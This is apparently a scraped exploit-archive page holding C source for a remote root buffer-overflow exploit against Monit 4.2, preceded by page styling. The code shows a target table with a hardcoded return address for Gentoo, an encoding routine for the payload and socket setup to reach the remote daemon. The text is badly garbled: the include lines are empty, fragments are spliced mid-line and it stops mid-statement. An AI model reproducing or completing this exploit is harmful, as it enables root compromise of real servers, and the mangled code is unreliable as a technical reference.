K-OTik : Monit <meta content="Monit 4.2 buffer overflow Remote Root Exploit" name="keywords"> <meta content="Monit 4.2 buffer overflow Remote Root Exploit" name="description"> <meta http-equiv="MSThemeCompatible" content="Yes"> <style type="text/css"> BODY { SCROLLBAR-ARROW-COLOR: #204558; SCROLLBAR-BASE-COLOR: #bdbcbc } SELECT { FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } TEXTAREA { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } .bginput { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } A:link { COLOR: #000020; TEXT-DECORATION: none } A:visited { COLOR: #000020; TEXT-DECORATION: none } A:active { COLOR: #000020; TEXT-DECORATION: none } A:hover { COLOR: #000020; TEXT-DECORATION: none } #cat A:link { COLOR: #204558; TEXT-DECORATION: none } #cat A:visited { COLOR: #204558; TEXT-DECORATION: none } #cat A:active { COLOR: #204558; TEXT-DECORATION: none } #cat A:hover { COLOR: #204558; TEXT-DECORATION: none } #ltlink A:link { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:visited { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:active { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:hover { COLOR: #000020; TEXT-DECORATION: none } .thtcolor { COLOR: #204558 } .bordert { BORDER-RIGHT: #a9a9ac 1px solid; BORDER-TOP: #a9a9ac 1px solid; BORDER-LEFT: #a9a9ac 1px solid; BORDER-BOTTOM: #a9a9ac 1px solid } td {font-family:arial,helvetica,sans-serif;font-size:x-small;}.tableborder { border:1px solid #345487;background-color:#FFF; padding:0; margin:0;width:100%;align:center } .post1 { background-color: #F5F9FD } </style>

Monit

/*
                              * THE EYE ON SECURITY RESEARCH GROUP - INDIA
                              *
                              * www eos-india net poc 305monit.c
                              * Remote Root Exploit for Monit 
                              #include 
                              #include 
                              #include 
                              #include 

                              #define         BUFF_SIZE       2048
                              #define         PADDING         40
                              #define         EXP_SIZE        (256+4+PADDING)
                              #define MAX_ARCH 2
                              struct eos{
                              char *arch;
                              unsigned long ret;
                              } targets[] = {
                              "Monit-4.2-Gentoo",
                              0xbf7fef02,
                              //-------------------------------
                              "Monit  THE EYE ON SECURITY RESEARCH GROUP >2;
                              b5= ((b1&0x3)>4);
                              b6= ((b2&0xf)>6);
                              b7= b3&0x3f;

                              *p++= encode(b4);
                              *p++= encode(b5);

                              if(i+1= MAX_ARCH)||(nh_addr);
                              sin.sin_family=AF_INET;
                              sin.sin_port=htons((u_short)rport);
                              if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))